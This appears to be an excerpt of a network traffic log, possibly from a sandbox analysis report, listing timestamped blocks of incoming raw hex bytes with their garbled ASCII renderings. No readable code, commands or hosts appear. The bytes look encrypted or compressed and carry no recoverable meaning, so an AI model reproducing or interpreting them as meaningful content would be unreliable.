                                                                                                                                                2022-09-29 12:49:27 UTC6173INData Raw: b8 f6 ff b3 21 a3 8c a2 ed 07 36 d1 c1 7e f1 3d 31 6b bb b3 f6 ad e8 7f b9 a3 c3 d2 e2 6e 3e 3e 59 6f 21 8d 6c 1e 8f 05 08 04 ad 23 68 d4 27 8b 38 aa 57 37 92 9e 2c fc a1 14 74 53 78 9a d6 61 3b d4 3c 3e 24 a8 62 6e 28 d9 4d 83 61 e2 1d 96 b1 56 8e 2d 9f eb a6 8c e4 37 36 b5 01 75 08 d2 49 46 9c f1 d4 25 c1 53 40 fd 0c 24 9c 15 c3 03 72 6e a0 a3 3a 8f fc 05 70 41 62 aa f5 14 36 76 b1 68 e3 2e f4 fc 1a 9d cc 89 94 8c 69 91 42 a7 79 91 f0 c8 d7 f8 16 43 f4 36 07 dd 26 a1 1e ae 19 49 48 c3 79 b1 e6 5b fc 4e 3d 30 2b 84 88 ff 3d 20 b2 a6 e4 42 2c 7b 63 78 31 64 5d fd b4 3c d7 8d 81 c0 80 56 81 a3 7d 15 4e c3 f4 ed 6f d6 f7 73 7a 00 13 14 d7 8f 72 b8 ba f4 8c 1f 34 c2 e1 03 b1 a6 c0 99 42 0a 82 4a 47 8e 9a f4 54 92 48 89 e9 e9 3f 38 aa c0 03 29 78 c6 15 b7 ae
                                                                                                                                                Data Ascii: !6~=1kn>>Yo!l#h'8W7,tSxa;<>$bn(MaV-76uIF%S@$rn:pAb6vh.iByC6&IHy[N=0+= B,{cx1d]<V}Noszr4BJGTH?8)x
                                                                                                                                                2022-09-29 12:49:27 UTC6189INData Raw: 63 8e bf b3 ee 61 80 54 c3 5a 2b 03 d1 f0 b1 0b 00 0d 72 28 f7 06 3d 58 03 29 3b f1 b2 ec 67 56 1f dd ed 98 08 c2 26 aa a1 fa 4b 43 d5 0c c2 7a 73 38 ac e2 5e 45 e0 fc e5 ab 65 13 9d e1 92 af 10 c9 92 c5 68 38 6e 41 27 3c b9 28 ba 85 13 05 7c ba 7b 51 ec 49 89 04 a2 1e 58 59 ff 7f 4e c5 b0 32 59 e9 cf 9c 3c a2 c0 c1 14 cc c8 41 4c 77 ca 47 ff 80 91 34 9d fb d2 03 c5 2c 99 f6 34 92 21 a5 7a 67 d7 06 4d 67 13 13 84 63 b7 08 09 1a b2 f4 0a d4 a1 6e ee df bb 0c 70 12 5b 8a 49 57 1b c1 dc 30 09 66 8d 70 8b 23 61 16 d9 57 73 69 4d 14 bb ce 6d bc de 9d fc 69 2c 7e 20 9e ff 4c 7e b4 11 3f bb e8 e5 4f 71 91 cc cd 10 13 34 81 6e 20 51 a3 b1 ae 86 7d 46 b5 8f f7 9b fe 75 b9 30 7d c1 c9 2d 99 c8 48 fe 66 3f c0 f9 e8 e6 da 8e ea b3 a8 06 e1 4b b4 90 a8 08 47 2d d9 a6
                                                                                                                                                Data Ascii: caTZ+r(=X);gV&KCzs8^Eeh8nA'<(|{QIXYN2Y<ALwG4,4!zgMgcnp[IW0fp#aWsiMmi,~ L~?Oq4n Q}Fu0}-Hf?KG-
                                                                                                                                                2022-09-29 12:49:27 UTC6205INData Raw: e1 3a d2 b8 57 5a 8c df b6 56 66 d7 e1 3c ff 9e 72 5c 6c 50 8e c3 54 e9 41 3c 50 30 67 53 cc 67 86 a3 62 6c ca 98 8c aa 73 dd 7c 38 08 09 19 a5 40 e2 ad cc 0a 2d 1a 80 ae 8c 3f ba 4f 23 1f ab 37 e6 d6 c3 8b 46 13 18 90 c0 1a 06 58 e0 be ec 81 55 d6 14 f6 84 41 75 ff b9 59 27 10 53 d9 1e 91 0c c5 cf 7e 41 91 12 f2 bd 30 cf d7 a8 ac b1 3f 48 00 d2 09 bc 20 cc c5 b9 bd 16 47 dc f7 2f 53 c4 b0 50 c9 93 f0 d8 c2 a1 ad 2f 82 b0 a1 2e 2d 71 fb 57 8d 7e 3b 44 7b 8e 35 0b 85 13 74 88 8b 8c 68 32 0f 22 ce 19 2e 44 0d 17 0a 6a 65 9f de 31 0e a9 92 56 fb 54 ff 2e 5f ce c7 48 71 0d ba 5d 25 74 8e b8 cc eb b8 df 6c c2 42 44 f1 af cb 6a 03 0b 37 87 fd 60 9f c5 b3 a0 96 80 ef b6 ef 66 2d 54 4b 42 62 46 ce 11 08 18 00 41 7e e6 2a 9b a9 82 d0 ed 6a 88 63 87 bb 94 c9 56 81
                                                                                                                                                Data Ascii: :WZVf<r\lPTA<P0gSgbls|8@-?O#7FXUAuY'S~A0?H G/SP/.-qW~;D{5th2".Dje1VT._Hq]%tlBDj7`f-TKBbFA~*jcV
                                                                                                                                                2022-09-29 12:49:27 UTC6221INData Raw: 95 22 93 5b f1 1b 1d 1d 38 11 8e 6c 30 8f 22 16 81 9a 0a 6b e8 ee 55 b5 94 73 a7 01 23 d5 d6 8a eb 0e 5e a4 73 2d fd 38 5d e0 e9 ac da 9a e8 f8 3c 08 9b 59 c5 a7 40 ad 21 2e 85 2f 3d 61 c6 5a fa 53 ba 4a 5e 1e 39 a7 3d 93 53 5f 6a 45 f9 94 7e a3 03 23 e4 db 44 ea 43 04 cf f1 8f ba 90 cd 29 35 cc 4b 82 82 35 84 62 8d 3a e3 5f 54 01 f2 42 41 9a 23 25 60 c7 a3 31 eb e6 13 f5 7d 4d 75 33 41 23 a9 db 10 d9 51 18 62 94 a1 89 db 63 27 06 7b 51 d9 13 1c a9 95 81 16 60 97 d7 b8 17 b3 2d 90 28 49 de 8e 6d c0 34 8e 72 f3 c6 de 2f ce 89 fc 13 69 84 bb 8d 7d 0f cf 16 36 97 a9 1d 12 c1 cf 8e 47 8d ff 25 0a eb 27 e2 75 f2 4a f6 31 59 75 bc 6a 22 fd db 97 9b 42 a8 2a 24 6d 4b aa 63 16 ae f4 b0 94 18 31 12 1d 70 8c 9e 5d 2a 07 72 a0 d2 6d 3c 52 c3 62 25 9b e1 59 12 01 68
                                                                                                                                                Data Ascii: "[8l0"kUs#^s-8]<Y@!./=aZSJ^9=S_jE~#DC)5K5b:_TBA#%`1}Mu3A#Qbc'{Q`-(Im4r/i}6G%'uJ1Yuj"B*$mKc1p]*rm<Rb%Yh
                                                                                                                                                2022-09-29 12:49:27 UTC6237INData Raw: cc 3e 57 2e 12 f8 a7 62 88 1e ec 24 41 1f e4 18 55 84 ee 68 8e cc 73 61 96 78 fa 3a 81 d1 ee b8 87 64 92 6d 85 e3 b4 31 b3 10 89 3c 5d 29 50 ed 34 06 37 6d a8 6b c4 72 f1 15 4f fc c0 0e be ab 3d 39 fa 52 5a cc 92 28 e8 5a 6b 83 a3 2a d8 05 a0 29 0b de f0 3f c4 1f a7 f5 39 a4 de f3 36 41 7a c7 a0 52 e1 25 3b fa b8 f5 fb 19 d0 6c b8 61 20 4b 22 dd 0e d2 81 dc 8a 48 ad 9b 05 b3 65 41 4c 21 96 33 3e 0f 3c b9 83 77 09 38 19 70 26 95 14 e5 25 77 7c 27 2a fe 84 76 78 30 f0 1f 34 67 31 be d3 16 8a 02 c2 29 e0 f9 14 3a ca f7 db a4 e5 0b aa f1 77 6d 67 e3 33 2d ad a7 81 89 74 75 0f ac ee 30 a7 f9 72 b3 a3 86 3e cb a1 3e 63 07 84 e7 0e 23 0d 74 7b 5b 1f 47 2c 89 4e 0f c1 6f 2d 31 da 87 fa 7c 91 09 7d 6f 5b 69 7b c8 c4 7a 5e 63 11 9c 80 ff d1 95 1e ae eb 08 96 8c 73
                                                                                                                                                Data Ascii: >W.b$AUhsax:dm1<])P47mkrO=9RZ(Zk*)?96AzR%;la K"HeAL!3><w8p&%w|'*vx04g1):wmg3-tu0r>>c#t{[G,No-1|}o[i{z^cs
                                                                                                                                                2022-09-29 12:49:27 UTC6253INData Raw: 22 7c 5b ff 1f 99 e2 df c0 5f 3b 9c c7 ee 01 7c 5f bc ec c6 17 cf 52 a2 e4 e1 18 c4 f7 78 f4 bf ac bf d5 60 06 41 7a e9 1f 06 7c 7f 6a 70 2d a6 fe 63 db 71 44 e0 4f a8 4c e6 79 53 d3 41 ba cb fb f5 cb 8b 91 84 10 81 98 a7 7e 09 04 6e 36 6e 31 85 33 29 06 d9 a2 11 3f 81 39 81 a3 51 2b cb 0b 08 5b 6f 64 fa d7 c2 6f d7 5b 5d fa 54 b0 30 53 0b 41 0f f8 39 82 9c 03 f7 66 80 3c 2b ca 4e c9 e0 1c 4a 41 8e 2f e3 24 27 eb 19 5a 80 8a b4 cc 2a 0b 4b d5 4a d4 37 ee 71 f1 cc c0 55 e8 9e f5 64 04 a9 ff 45 40 ee 88 0f 74 be 4e 09 01 7b 0f 60 16 f6 ad 9c 09 16 0d 0c 12 65 a8 73 07 ec b4 30 30 b1 b4 aa 57 42 17 65 b5 25 bd ea 56 ab 11 a0 b4 df bc 70 3f 85 69 90 6e 21 c6 54 ac 2d e0 85 0e b0 7e 4b 71 64 af 26 81 30 1f 68 37 17 6f 25 12 af b9 8f f6 cd 61 7c 2e 95 a6 2b ad
                                                                                                                                                Data Ascii: "|[_;|_Rx`Az|jp-cqDOLySA~n6n13)?9Q+[odo[]T0SA9f<+NJA/$'Z*KJ7qUdE@tN{`es00WBe%Vp?in!T-~Kqd&0h7o%a|.+
                                                                                                                                                2022-09-29 12:49:27 UTC6269INData Raw: f7 36 33 43 0a 51 4e 02 dc 97 96 34 ad ec cc fe 09 8d 52 a5 4c c3 91 ae 3c 33 4e 35 64 07 d8 c4 dd 9b 9a f4 9b e2 cd c7 c0 98 32 30 0b a7 a7 99 55 b5 fa 7b da 20 3a 23 94 9e f8 bc 49 32 31 93 2b 44 dc a6 de f9 82 54 2f 62 86 a4 93 40 ef ba e7 da c7 1d e0 04 75 57 a8 a4 92 b4 0b 36 a0 6c e6 7a 85 17 ec 5e 28 3c 6c e3 2c 8c 75 95 52 56 2e ab d1 a9 bc 27 45 cb 4f 1f 24 ea 35 d5 f0 d0 6a 90 42 a9 86 e1 8c 94 f1 81 78 ee 00 31 da 08 f1 74 4c e4 e9 99 eb 4d d2 4c 40 a4 b4 d8 6e 1b 19 84 68 0d 6a dd 1e 32 83 50 96 98 29 29 1d c8 11 c9 b7 6b 3d de c7 57 77 e9 c8 8c b2 8a 85 a2 10 33 25 e4 bd a8 5c 2f 1d 98 72 da c2 ab c5 ab 11 b8 0f 09 3e 37 d8 61 88 4b 95 91 1a ff f5 0a 4e 77 ba da 1c a1 b7 e6 64 94 1b cb 54 72 67 07 ac a7 44 72 ea 3a 11 5e 1d 1b 22 8a 47 63 17
                                                                                                                                                Data Ascii: 63CQN4RL<3N5d20U{ :#I21+DT/b@uW6lz^(<l,uRV.'EO$5jBx1tLML@nhj2P))k=Ww3%\/r>7aKNwdTrgDr:^"Gc
                                                                                                                                                2022-09-29 12:49:27 UTC6285INData Raw: a5 de a7 d8 ef 93 ff 59 ef 0d 7b 97 7d 51 0c eb 20 60 fc 41 37 4f 32 9a 8d 4f 0f 78 bc b0 a6 0d 79 ad 39 76 da 64 bb bb 08 a9 fa 36 4b d7 e8 e0 eb ea d4 03 86 91 26 f8 29 42 e2 21 9e 96 53 24 0e 57 98 5c e8 f4 1b 3c 8b 57 c1 f1 3d 92 72 19 2e 87 f3 6a 3a 51 8d 83 9b 14 c9 03 79 33 b1 7c 37 c1 ab 5c 3c b8 68 cd 9f db 5a 6c 1b f2 4d f7 3c 47 26 89 69 1c 7b fb 10 a5 34 fa f6 8e f3 ab 7f fa 41 f9 c5 18 20 19 f8 a3 bd 5c 5b 3c 01 7f c5 1d 36 c7 c0 1b ea 41 89 61 1b 89 5d b1 42 b4 c3 f7 95 35 36 82 b3 24 c1 60 c0 87 12 45 e4 14 bb f5 aa 7e d8 05 51 4b 7a 81 64 c4 49 c5 f7 4f 55 87 0d 4e 08 cc ad 56 41 cc 59 31 d4 ae 0d 30 04 dd f7 30 c1 98 de 88 6e 41 be fa ed 00 83 6d 9a e5 56 f2 6b 0f 68 e4 fe 6f 1a 8a b1 cf f2 36 80 c3 c1 7c 04 ba db ae fc ef 04 5d 1c cb a7
                                                                                                                                                Data Ascii: Y{}Q `A7O2Oxy9vd6K&)B!S$W\<W=r.j:Qy3|7\<hZlM<G&i{4A \[<6Aa]B56$`E~QKzdIOUNVAY100nAmVkho6|]
                                                                                                                                                2022-09-29 12:49:27 UTC6301INData Raw: d6 b0 f9 34 59 3c 5e ce fd 54 9a b1 db 95 01 86 b6 0a 3c 41 68 9f fc 88 35 94 8f fa c1 d8 0b 33 8b 09 24 88 d7 5e 96 48 22 96 73 37 07 dc 23 47 c3 41 4c b5 b6 e2 37 b1 b5 7c d3 c0 2a b5 08 b3 99 4d 3c 11 37 43 3a 5a 26 f6 22 aa 1b c8 13 26 34 c8 54 9d b2 b7 45 d9 55 10 2e 3b 62 d4 82 e6 8a 0a ce 22 17 11 7a 77 91 5d ad be 8f 25 7e 53 3d fb a9 34 fb 60 b7 03 b4 f6 4b db 88 d7 3d ed b0 94 6f 51 58 38 66 75 2a 47 5f 3e 0a 7d 6c f2 b5 9a 95 10 20 1e 0c c5 f7 68 d4 b3 1a b2 65 ef e7 b8 9f c1 84 e5 6a 90 e8 c0 9c 98 80 13 ed 5e 96 61 15 2c b2 f2 06 6e 07 a7 2d ce 29 43 89 2c 46 55 5a a4 12 47 9f c5 a6 45 0f 3c 5f 81 08 e0 24 e3 a9 17 cd 5b 01 69 3d 42 55 94 95 2b e6 b6 69 2c c7 37 6f cd d2 41 ad 44 5e 60 8d d5 09 b2 49 06 d0 23 df d8 18 82 44 6e 70 4d 8f d3 17
                                                                                                                                                Data Ascii: 4Y<^T<Ah53$^H"s7#GAL7|*M<7C:Z&"&4TEU.;b"zw]%~S=4`K=oQX8fu*G_>}l hej^a,n-)C,FUZGE<_$[i=BU+i,7oAD^`I#DnpM
                                                                                                                                                2022-09-29 12:49:27 UTC6317INData Raw: 1a 7c 5f 85 12 77 31 a2 59 29 55 9e aa dc 75 ca d9 ac 1b 86 0d d1 ec 50 a1 92 0f fb 7a 63 72 f2 69 e6 f2 41 65 4d 60 db 10 bc 75 31 7f f8 87 a4 c1 a4 71 18 81 2f f3 36 26 39 b2 e9 48 df 50 4c 0f d3 9c 62 7b 71 10 d9 7b b0 ca 12 2c 5f 4b 01 4e a9 02 37 f2 be 68 72 3a c2 85 c5 ab b5 ad fb a1 a3 50 f9 61 e5 39 a4 5a 3e df 2a 61 c4 13 8f be 4f 22 7d f9 d2 56 5e be a8 55 5e 08 68 58 b5 2b 25 28 06 a8 92 37 54 45 6e d6 b8 75 51 91 77 cd a3 8a f5 f1 94 75 60 ae 2e 6b b8 3b 4d 9d 26 d5 57 6f b2 75 09 bf a8 6a 63 55 44 94 aa e0 18 13 07 64 5c b8 d0 45 90 14 7f 8b 99 d7 5b 5d 24 f2 34 9b da 5f 70 82 d1 6d dc e5 61 4d 36 d0 19 c8 5d 4a ab fe 5b 0e c8 8c f5 29 74 de 44 5a 2e a1 52 31 d6 56 c7 77 98 1e 87 49 60 1e fd 02 70 e2 e3 ab 34 5b 9a c8 58 c0 c7 ae 8d de 0b 7a
                                                                                                                                                Data Ascii: |_w1Y)UuPzcriAeM`u1q/6&9HPLb{q{,_KN7hr:Pa9Z>*aO"}V^U^hX+%(7TEnuQwu`.k;M&WoujcUDd\E[]$4_pmaM6]J[)tDZ.R1VwI`p4[Xz
                                                                                                                                                2022-09-29 12:49:27 UTC6333INData Raw: 09 60 f1 56 ac 09 e0 b7 33 8d 66 e2 6d 8b fc 72 9d b4 c1 fc 23 f9 e9 6a 06 48 69 23 a1 75 75 5e 6e fe 58 e6 f2 54 00 23 6e b1 80 f6 46 be da d1 06 8d f6 4d 29 0b 7b 8c 20 de c8 98 1e 11 24 22 95 04 0b 36 81 b9 71 36 6a f9 a2 d4 77 c7 a8 21 20 ba fe 57 59 cd 17 08 aa 32 d3 18 39 73 11 19 b3 a2 aa a6 9d 46 10 10 71 c3 a1 1f ff 41 bd 8e ac a9 c9 09 40 d9 2a d9 68 03 02 df bc 1d 21 57 c4 61 f0 9c d3 d3 53 43 cb ba 93 13 35 c5 54 df 08 a3 70 4d 49 08 06 88 c4 4c 1e ba e2 f5 27 f0 05 be 6e 9b c0 52 2f b3 36 64 58 17 44 34 b0 73 d9 48 7d 55 d5 f8 10 60 ba 1b 43 d0 fb b0 09 4b 61 cf 3b df 6d e6 2d 27 fb 48 59 33 0d 97 01 31 97 40 02 34 93 d5 29 ff 9e d9 13 b9 09 3f e5 cd 1f ae d6 ab 6a 54 23 2b eb a0 6f c6 cc ca f7 1f 21 b0 dc 07 bf f7 cd 2e 12 db 28 c2 e8 f1 11
                                                                                                                                                Data Ascii: `V3fmr#jHi#uu^nXT#nFM){ $"6q6jw! WY29sFqA@*h!WaSC5TpMIL'nR/6dXD4sH}U`CKa;m-'HY31@4)?jT#+o!.(
                                                                                                                                                2022-09-29 12:49:27 UTC6338INData Raw: 81 82 5c 33 49 c4 e0 31 4c 4f 78 2a eb b8 6e e6 40 76 4f 21 70 cd 30 0b 79 05 bf d5 ce e0 bb c1 b1 d7 3d 56 ca 1a 04 35 bb 06 09 84 eb 94 f5 2b d8 9b 70 b8 a6 aa 41 67 a5 d7 5f c4 2b db 74 f9 5b e0 c5 a2 9b ff 62 87 8a 7e 7d 31 6d 74 04 ab 30 42 6e 97 d3 91 54 3a 30 39 b9 5e 9f 82 3a 63 bf 81 f4 87 46 86 7f e0 81 62 e4 76 71 fa 12 09 98 0d 6f 79 79 c2 21 c4 f5 ae 6d dd bd 29 65 6b 96 4a 26 38 56 79 db de 16 ba 93 ed 34 66 d6 5c c3 81 12 4b 47 96 68 23 30 17 b0 e0 3b d6 12 e3 09 52 14 c9 2e c8 57 b9 86 a2 e9 57 70 5f f1 73 94 5a 84 23 ea 34 9f 1e fa db 22 f2 05 af e6 28 5e 37 e9 87 7a 06 c0 7c cc 2d 20 c2 19 42 47 cb 64 89 ff 96 df 18 ee 71 c3 30 5a c4 f0 69 e9 d2 88 76 c9 7e 8f 74 5e 15 d5 b0 bb 8e e9 ea 2a 02 d4 c4 fa 24 83 62 62 ea 69 7d d5 f7 ca 01 af
                                                                                                                                                Data Ascii: \3I1LOx*n@vO!p0y=V5+pAg_+t[b~}1mt0BnT:09^:cFbvqoyy!m)ekJ&8Vy4f\KGh#0;R.WWp_sZ#4"(^7z|- BGdq0Ziv~t^*$bbi}
                                                                                                                                                2022-09-29 12:49:27 UTC6354INData Raw: 90 f0 44 36 fd 9c ca 19 c6 8c 5c 02 b2 28 d8 f9 41 3d e7 34 76 03 31 0c 92 a6 0e a7 cc f5 3e fe 7c dd c1 9c 97 aa ae ac 4f 60 fa 04 4b 97 05 44 b5 68 48 2d 66 88 23 b0 04 01 e2 0d 5a 77 c8 cc 8c 58 32 94 80 02 e1 0a 84 79 fd 97 3a 69 af 51 35 6c 83 cb 12 b4 c3 a5 89 e3 ad d6 83 42 c8 fd fd df c5 5c 4c 91 db e4 fd 70 4d 0c b2 e4 b6 a6 4e d6 2b fc 50 c3 25 eb b4 1c 00 d6 d5 ca 50 01 be 7e 2b e9 c9 73 17 b5 81 27 94 0b 6d 70 19 56 fb 23 b6 91 0b 59 98 20 90 ec 43 34 eb 51 25 8f 99 61 00 d6 5e 81 81 21 fe 95 a6 fa 13 aa 34 f3 02 3f cf 94 73 d8 47 c7 1f fc 3f fa 2c d9 f0 4c 40 e5 0a 80 42 47 f5 59 a3 68 70 57 3e 1c c1 77 aa 24 49 71 67 df 58 e6 43 ca 6d 3c 83 b5 ea cc 34 e9 d1 95 ee a1 6f c6 fa b0 38 18 bb 82 6f e4 1b 9a f4 e2 48 74 4c 66 cc 27 02 da e6 a6 3c
                                                                                                                                                Data Ascii: D6\(A=4v1>|O`KDhH-f#ZwX2y:iQ5lB\LpMN+P%P~+s'mpV#Y C4Q%a^!4?sG?,L@BGYhpW>w$IqgXCm<4o8oHtLf'<
                                                                                                                                                2022-09-29 12:49:27 UTC6370INData Raw: b6 74 ae 37 88 ba b6 4e 69 be b3 20 61 da 74 36 78 44 17 ba d4 c0 82 6a 2b ec 08 1f 0b 22 ef 6f a1 37 f9 c6 a0 05 ce 36 d1 bb 86 5a 55 63 4b 6e 3b e3 8e ef 0b 6d 12 82 68 b0 7a 43 97 9e fc e5 f6 e7 37 2d fa 13 3c 49 d0 9b a1 b7 68 2d 6a 64 38 36 65 84 3d a6 91 ac c5 8d c0 aa d9 35 e3 2a 94 93 d9 b7 56 47 67 51 f8 c7 29 01 16 82 aa 44 48 2a 10 5f c8 30 9e 48 30 68 a1 3a b4 da 0f a4 aa de 50 50 80 37 70 bb 8b e2 a0 e9 f1 6b e8 2b 11 80 e2 d6 40 4a 4d 23 61 15 5e e2 5f e5 b1 fe 8a 81 fc f6 43 20 70 94 bf c0 05 d4 de 3e 9a a4 b1 9b e4 52 7e cb c3 75 43 e6 6c ed 64 b4 df 9f 7c 19 22 e5 d2 83 23 6d 68 96 09 2f 0e b6 c7 8b 1d 39 86 09 35 ef 0f 49 71 53 99 2b c0 48 86 f4 37 71 14 07 ce c1 83 4f a1 29 d9 d0 c9 b6 32 c5 08 0b 19 0f b6 9b 5f c3 21 09 64 5a ab 26 ee
                                                                                                                                                Data Ascii: t7Ni at6xDj+"o76ZUcKn;mhzC7-<Ih-jd86e=5*VGgQ)DH*_0H0h:PP7pk+@JM#a^_C p>R~uCld|"#mh/95IqS+H7qO)2_!dZ&
                                                                                                                                                2022-09-29 12:49:27 UTC6386INData Raw: ee a6 fe db ac 1a 9e 19 0b 09 fb 32 fe 0a 67 a1 81 d9 0a 11 61 cd fc 23 50 30 b0 b1 e2 3a 36 cc 70 e2 e4 7c 8c 51 19 b3 52 10 4d 7c 80 65 58 22 fd f3 e0 e9 c3 62 6e dd f5 1a 4b 1a cd 1f cb 33 92 2b cb 4b 15 14 10 68 e6 6e 44 b1 29 9b 6f 3d 29 24 77 8a 45 75 fe 76 dc 4a b8 3a 91 0a 00 72 0c fa 8c 1b 2e 55 eb b4 16 68 32 b4 ea 8c a3 80 ef bd 07 47 99 74 66 8b e9 85 19 3d 56 e5 1e d4 25 70 40 72 55 18 75 7b fd 07 e6 4f 3c 17 65 ab 52 b4 d5 51 f6 f4 43 a4 df 45 1c 14 7d 43 d3 7b 9a cd f7 37 64 34 df 76 b2 35 64 f3 9a 5a 52 28 44 04 34 d6 d9 de 80 ff ae 8a 00 0f 3c 14 7d 6e 14 69 f4 ab d7 8b 88 52 24 4d 1e d2 d4 3a 96 99 3a 76 d8 cf 9b 78 a7 89 45 a8 19 37 cc 79 1f 75 e0 d2 bb 8b 3e 27 43 b7 a0 0b 4e 98 27 78 b8 18 17 09 89 e3 44 a7 e2 17 1f 93 70 84 d7 b1 15
                                                                                                                                                Data Ascii: 2ga#P0:6p|QRM|eX"bnK3+KhnD)o=)$wEuvJ:r.Uh2Gtf=V%p@rUu{O<eRQCE}C{7d4v5dZR(D4<}niR$M::vxE7yu>'CN'xDp
                                                                                                                                                2022-09-29 12:49:27 UTC6402INData Raw: 99 93 28 6a db fa 0c 40 5b 38 d9 74 c2 3c eb 64 b1 c3 e0 25 bf f6 5f 7c 63 82 55 b9 56 3d 4c 69 fb 7d f1 f7 ae 63 d4 03 db 49 1c c3 c6 df b9 8f e4 24 39 f4 c2 88 5c e0 37 57 23 54 ca 58 b0 b8 64 ba 41 97 86 00 21 8a 22 d6 b3 a7 8d bc 4b 0c c0 48 79 a0 91 41 8a be b8 0d a9 d2 49 97 64 7a 54 27 a9 e4 79 b0 62 48 af 23 ea 06 56 d7 87 87 df cf d1 f3 62 15 59 46 6e da 83 97 27 80 35 8b 4a cf ba d7 e9 88 06 05 53 02 f0 cd 7f 7e c2 f9 04 1d 1b 41 cd ea 8f ae 2b bb f6 dd 83 47 15 a7 4a d1 03 b1 57 76 9e 79 32 74 f0 2e 67 54 ac 26 7f 72 65 63 95 33 9b 7e 41 f1 9b 53 3f 70 b5 dc be 9f 9b a9 44 f4 70 60 20 a6 24 70 20 88 6a b1 97 8e 44 e2 7c 07 f1 4f cb 41 8a 52 c8 58 23 ae d3 f8 33 f2 2f f2 fb f1 ba c2 b4 b8 1f 39 61 ba d8 6a ef 8c 51 7a 3c 93 59 26 11 d4 b7 91 3a
                                                                                                                                                Data Ascii: (j@[8t<d%_|cUV=Li}cI$9\7W#TXdA!"KHyAIdzT'ybH#VbYFn'5JS~A+GJWvy2t.gT&rec3~AS?pDp` $p jD|OARX#3/9ajQz<Y&:
                                                                                                                                                2022-09-29 12:49:27 UTC6418INData Raw: 6d 5e b5 41 e5 c8 24 4f 1a 3d 47 54 a0 ed eb db 36 ed 75 4c 05 bb 5b 7c c7 d6 de 7c e3 e0 41 f8 0d af c4 e8 a8 57 9b 93 a4 ca b3 c3 d1 04 3e a9 43 ae ae 7c dd ff c5 10 89 18 35 9a 2d bf 6c 59 77 16 9a 80 bb ce 82 80 c8 bb 4e 53 08 44 68 80 77 a0 02 5d 66 2f e7 e9 01 cd cc 42 0d d8 d3 77 df e2 e1 4b 65 29 8c 1a 9c 86 83 5b 4e bd 1a 6f 68 e9 70 43 54 c2 87 f5 ac 44 ee aa b2 17 99 50 be 01 79 6f 6f 2d d2 a3 5b 0c 50 e5 9a 6f c5 ca b6 1b b6 3a ad 8e 99 83 d4 92 77 88 73 9f ed 82 37 ed 31 74 33 25 b5 61 4f fa 14 10 20 17 66 47 2b 52 ee ea 99 12 08 0e 5e 42 1a c8 1d 25 5c a7 df 45 0a 86 1a 38 f6 7b be e4 bf bf 20 c4 78 10 b3 33 ca 7a 93 64 e0 fc 7b 07 4e 53 06 11 01 99 14 49 45 00 c2 43 cd 6c bf 97 4d 6e 2b 38 7c b6 43 60 b0 b1 70 43 dd fe 79 c5 01 5d 8a f4 e1
                                                                                                                                                Data Ascii: m^A$O=GT6uL[||AW>C|5-lYwNSDhw]f/BwKe)[NohpCTDPyoo-[Po:ws71t3%aO fG+R^B%\E8{ x3zd{NSIEClMn+8|C`pCy]
                                                                                                                                                2022-09-29 12:49:27 UTC6434INData Raw: 20 82 e1 69 ac 8f ae e3 23 ca d7 f6 3f 1d b6 ef 14 09 fe db 21 df b2 0f 9a 51 6f 00 ca 46 2e 47 ff 38 e5 eb 9e f6 5e f9 f1 7f fa f7 a0 c7 a0 20 0b fb d1 8b 90 36 58 ad 1f e2 4c 49 03 1b b0 52 52 a9 3c fa 57 e2 52 3c 35 05 15 c1 27 82 73 f7 e1 fa 42 db 35 67 60 e3 4f a8 3b 9c a7 a2 df 6a 1b 34 13 ee cc 10 88 bd ce e8 8b fc e7 3a e1 93 07 3b 5b 5a bc 15 59 8f c8 4b 10 bd ce 40 67 5d 63 0f 33 b6 b1 38 38 92 1e b1 1f 8d 38 0e 9a cb a7 6a a6 37 1d 00 2a f5 49 c0 7d ac 7b 5b 7a 69 7a 38 c1 eb 93 39 47 13 85 ee c2 06 a1 cb 91 1f aa 49 d0 d2 ce a9 1e 55 2e 72 8c 84 37 ef 78 ce 03 17 2f c8 2c 2f 30 b8 e6 21 49 1f 37 ae ed 3b 3e 9f 90 76 c9 d9 98 40 0d 67 df 10 03 49 11 8f d7 17 c5 7a 1b b8 c5 ba 1e 49 da 51 ce 64 e8 04 20 eb 27 2c e8 2d e2 46 2b 82 ac c4 d0 d3 c3
                                                                                                                                                Data Ascii: i#?!QoF.G8^ 6XLIRR<WR<5'sB5g`O;j4:;[ZYK@g]c3888j7*I}{[ziz89GIU.r7x/,/0!I7;>v@gIzIQd ',-F+
                                                                                                                                                2022-09-29 12:49:27 UTC6450INData Raw: 31 92 4c 77 5d 1d 92 c6 67 49 0e 4a 53 21 d5 b8 f9 43 7a 58 a1 ae b3 23 35 7f 3b 26 ac f0 8f e3 c9 46 bc 96 18 34 3c c6 56 c5 68 e6 51 2b 65 2d 72 ba 00 30 a9 04 7b 1e 12 95 ac f3 b1 c9 e4 e6 8c 15 9c b7 64 30 b3 df 9c 24 96 cb f6 36 75 d6 a5 08 7c 76 b4 68 da f8 6e e0 ec 8a e4 0e 66 76 7b fa 35 66 67 9c 53 18 a7 a8 1d 3e 73 2f db f1 5a 20 36 5f 22 e7 80 ef 15 af 56 d2 75 4f 1a 5e 8e b5 3d d4 31 60 f4 f0 7a b3 a9 12 d4 51 72 63 e5 0d 33 db 52 0b b2 ee 45 52 c3 20 e3 96 3f 3f 82 f7 27 6d f3 3c 72 36 78 0d a3 21 7f 5a 0b 32 fc 45 2d 38 19 c1 45 d4 4a 99 25 e1 3e 3a 42 16 d4 e6 ce d8 51 d6 26 4d b3 c9 b0 c0 ca dd 0c d8 06 7d 4b 02 bb 94 ce d3 f6 d5 de 0b d1 ed ae 0d cb e1 03 ed 49 b1 72 ec 1c c7 23 e3 9e c0 fc f5 d1 5f d5 b1 7a c8 c4 de 48 d8 2f d4 70 9b d9
                                                                                                                                                Data Ascii: 1Lw]gIJS!CzX#5;&F4<VhQ+e-r0{d0$6u|vhnfv{5fgS>s/Z 6_"VuO^=1`zQrc3RER ??'m<r6x!Z2E-8EJ%>:BQ&M}KIr#_zH/p
